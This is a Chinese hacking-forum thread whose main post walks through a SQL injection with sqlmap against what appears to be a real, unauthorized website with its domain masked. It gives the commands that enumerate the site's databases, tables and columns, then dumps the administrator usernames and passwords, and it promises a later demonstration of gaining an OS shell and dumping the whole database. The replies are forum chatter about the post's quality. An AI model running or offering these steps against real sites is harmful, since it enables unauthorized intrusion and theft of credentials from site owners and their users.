实战sqlmap注入
神器sqlmap大家应该耳熟能详了,我也就不多介绍了本次给大家简单演示一下怎么使用它注入
测试站点xxxxxx.com
首先我们得到的信息是服务器是08的,IIS7.5
然后查看一下数据库
sqlmap.py -u http://www.xxxxx.com/index.php?fid=1001 --dbs
好,有两个库,分别是information-schema以及zb-socket2
我们来列举一下zb-socket2库里的表
sqlmap.py -u http://www.xxxxx.com/index.php?fid=1001 -D zb-socket2 --tables
有25个表,可能有的人会问这么多表该看哪一个,一般来说都是看带有admin或user的表,好我们来看看adminlist这个表的内容
sqlmap.py -u http://www.xxxxx.com/index.php?fid=1001 -D zb-socket2 -T adminlist --columns
可以看到,这个表段里存在5个字段,
我们看一下username和password这两个字段的内容是什么
sqlmap.py -u http://www.xxxxx.com/index.php?fid=1001 -D zb-socket2 -T adminlist-C username,password --dump
ps:我这是两个字段一起看的,要用,号分离,如果查看一个字段内容则是sqlmap.py -u http://www.xxxxx.com/index.php?fid=1001 -D zb-socket2 -T adminlist -C username --dump
好了,管理员账户已经出来了。
按理说应该是md5,但这个不知道为什么不是,不过无所谓了,写这篇帖子主要是为了让大家了解sqlmap注入的全部过程
本来还想演示一下--os--shell的,但是没有权限,所以就不演示了,下次再演示如何拿shell以及脱裤
纯手打,望加精
哎,楼主啊,你这些贴子,亲,这种帖子都能加精的话,那么我们太极实验室的人写得任何一篇帖子都能置顶了。 已收藏,有空仔细看看
http://www.ihonker.org/thread-7445-1-1.html
http://www.ihonker.org/thread-7810-1-1.html
http://www.ihonker.org/thread-8048-1-1.html
按你的标准,你看看我的那个帖子不能加精置顶 wuyan 发表于 2016-3-23 17:21
http://www.ihonker.org/thread-7445-1-1.html
http://www.ihonker.org/thread-7810-1-1.html
http://www.i ...
好吧好吧 莫言 发表于 2016-3-23 17:45
好吧好吧
不是叫楼主放弃的意思,楼主继续努力,拿出真本事来 报警了,等着查水表吧你 :(顶贴 交流
页:
[1]